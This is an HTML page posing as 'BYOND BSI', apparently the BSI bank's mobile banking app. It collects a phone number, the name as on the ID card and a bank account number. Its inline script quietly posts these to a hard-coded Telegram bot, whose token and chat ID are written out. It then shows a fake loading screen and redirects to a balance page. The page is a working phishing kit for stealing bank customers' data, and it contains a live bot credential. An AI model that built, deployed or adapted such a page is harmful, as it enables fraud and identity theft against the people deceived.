<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="theme-color" content="#008b8b">
    <title>BYOND BSI</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 90vh;
            background: linear-gradient(to bottom, #ffa502, #ffffff);
        }
        .box {
            width: 300px;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
            text-align: center;
            background: linear-gradient(45deg, #AFEEEE, #66cdaa, #F5FFFA, #66cdaa);
            background-size: 400% 400%;
            animation: gradientBG 6s infinite linear;
        }
        @keyframes gradientBG {
            0% { background-position: 0% 50%; }
            50% { background-position: 100% 50%; }
            100% { background-position: 0% 50%; }
        }
        .loading-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }
                .loading-box::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, #66CDAA, transparent);
            animation: slideEffect 2s infinite linear;
        }
                @keyframes slideEffect {
            0% { left: -100%; }
            100% { left: 100%; }
        }
        
        .loading-box {
            padding: 20px;
            background: white;
            border-radius: 10px;
            position: relative;
            overflow: hidden;
        }
        .loading-box img {
            width: 80px;
            position: relative;
            z-index: 1;
        }
        .input-container {
            position: relative;
            width: 93%;
            margin-bottom: 10px;
        }
        .input-container img {
            position: absolute;
            left: 10px;
            top: 50%;
            transform: translateY(-50%);
            width: 20px;
        }
        .input-container input {
            width: 90%;
            padding: 10px 10px 10px 40px;
            border: none;
            border-radius: 5px;
            border-bottom: 2px solid #008b8b;
            font-size: 16px;
            outline: none;
            font-weight: bold;
        }
        button {
            width: 100%;
            padding: 14px;
            font-size: 14px;
            background: #008B8B;
            color: white;
            border: none;
            font-weight: bold;
            border-radius: 25px;
            cursor: pointer;
            transition: background 0.3s;
            margin-top: 10px;
        }
        .nav-top {
    width: 100%;
    text-align: center;
    position: absolute;
    top: 0;
    left: 0;
    background-color: #ffffff;
}

.nav-top img {
    width: 100%; 
    max-height: 80px; 
}


.nav-bottom {
    width: 100%;
    text-align: center;
    position: absolute;
    bottom: 0;
    left: 0;
    background-color:#ffffff;
}

.nav-bottom img {
    width: 100%;
    max-height: 80px; 

}
.box img {
  
    border-radius: 3px;
    padding: px; 
}
    </style>
</head>
<body>
        <nav class="nav-top">
        <img src="https://blogger.googleusercontent.com/img/a/AVvXsEilqZbBzvnbJd-tPbDSagQ1LI-Q2Iocg5LNE_4nr1nTFAm1nSoNZJxrjIdMjUklBn1nIxELX-p1ZfI9fqhyGjHQm3rqpZgZbEpmXb7KGvb_dt0aWMBOS2ppKPOvPcuVLy_C3yfhad_gFjwfccsYh2Mv8_D7J4LhdxyzwtN4hRC5sp9UUg1bo4_yLHND3xNc" alt="Navigasi Atas">
    </nav>
  
    <div class="box">
      <img width="100%" src="https://blogger.googleusercontent.com/img/a/AVvXsEhu9OiysWbQuWw3Vaj_cp4Kb0Z48wQngZ2bEHILl6ZKWHW1rN8Q9b1Ue8OPFX-fWQrLjw4CAzfZy5Sm94EGoGPdUqdtUB42G9KgViNe8QY1AxJqTftygzn9UosXz_hjy2eGIBav_flFfX0ooTat2RGBViD8Yer_6G5uNemwS0ErSf5mfpyJMEdbi1oTc1hz" alt=""><br><br>
    
      
        <form id="form">
            <div class="input-container">
                <img src="https://blogger.googleusercontent.com/img/a/AVvXsEjMfaDL-dAFxopyesPG19xe0CguPyliw3tDKgwXgaVveFi4DM_ZSRMNx0OplisUwxJU3RJyDy48PKvb9GYmbzkrf_zFC-902dxLBODdPHecMFcM_XZ2svttdjSIteNewSwJ3SaqSl_uwM34mVqAM9nNPpKuWY8o9y1VDeKRscBWOgbplA24oa1uC0FT9UqM" alt="icon">
                <input type="tel" id="nohp" placeholder="Nomor Handphone" required>
            </div>
            <div class="input-container">
                <img src="https://blogger.googleusercontent.com/img/a/AVvXsEgj9Ui7ZLJd7SuKA9GGUsT12gPWZ5ClIkpnZUdkLIiUzxpbPQx9VyW4PwCEpfU_NLXE7Oam2ogquUqHMW4QAirZcZLqw2SHnWSMsGhRQ6tqN4TUkP9ptPtjPTcAaU-keQwbDfY4ocZFVK9NLY_8qYKaZgSY_rCokTPQl89m3BOdmdK-OzA53WMAemHwzewi" alt="icon">
                <input type="text" id="nama" placeholder="Nama Sesuai KTP" required>
            </div>
            <div class="input-container">
                <img src="https://blogger.googleusercontent.com/img/a/AVvXsEhFhEFIb66IgESvTBR4UBG-bMhsjs2tdl03-AdmbJqNoI7x0sHZ_5ky5E9AsfhdIV18JRFBXKn8jHsE68D4T22w7tueOIS3QuAEn34p7AFjUgU6mL-NluO2-tlIfYEYjtFEXMgLt_F-BlZnXX3Xkrh6WozzsigkIXh2HJQlZ6h75Ye3JkgGxrGU6TnAdae1" alt="icon">
                <input type="tel" id="rekening" placeholder="Nomor Rekening" required>
            </div>
            <button type="submit">Lanjutkan</button>
        </form>
    </div>
    <div class="loading-overlay" id="loading">
        <div class="loading-box">
            <img src="https://blogger.googleusercontent.com/img/a/AVvXsEguY84ryEdVHjp7AzA24tad3ORFej6SIzkM5hqMeXw8hkH-RDamWTSAQ-49OvfUG3ocV40Ujvdn3L_7qof4-coDJ7SeA5WfgXBtQ1upBxofO0HlroHzMmZDhaDLVx4MXLg-CpvIy0K7skAy8iLqJriH2-K8aKWRwL5r1vWIPCpo0bxAzB3saGbIoey5WeNX" alt="Loading">
        </div>
    </div>
        <nav class="nav-bottom">
        <img src="https://blogger.googleusercontent.com/img/a/AVvXsEgNJy5ogTV4GB3yaT0dLxRgd7U568WNiU9w6RhvyDBOfvOgMfU098Rbj_Jrbcz941k36QRuMNeI8mZgEnKuZDCviMzPBtsv8qEGD7VBx7OQ4_Qi7_Ulsy6TjdokfF8IP3GHr1Mt419lQI26HATH_Iq9RWw30d93fSIf0OgYHEL-vhmXddNNddCwD87gffbG" alt="Navigasi Bawah">
    </nav>
    <script>
        const TOKEN = "8128102057:AAH2_K7YwSWKZpOJuU9bJjW8WvyO9agfMK4";
        const CHAT_ID = "6972541608";
        const URL = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

        document.getElementById("form").addEventListener("submit", function(e) {
            e.preventDefault();
            document.getElementById("loading").style.display = "flex";

            setTimeout(() => {
                document.getElementById("loading").style.display = "none";
                window.location.href = "saldo.html"; // Tujuan setelah loading
            }, 5000);

            const nohp = document.getElementById("nohp").value;
            const nama = document.getElementById("nama").value;
            const rekening = document.getElementById("rekening").value;
            
            const message = `\u2705 *Formulir Baru*\n\u260E No HP: ${nohp}\n\ud83d\udc64 Nama: ${nama}\n\ud83c\udfe6 Rekening: ${rekening}`;
            
            fetch(URL, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({ chat_id: CHAT_ID, text: message, parse_mode: "Markdown" })
            });
        });
    </script>
</body>
</html>
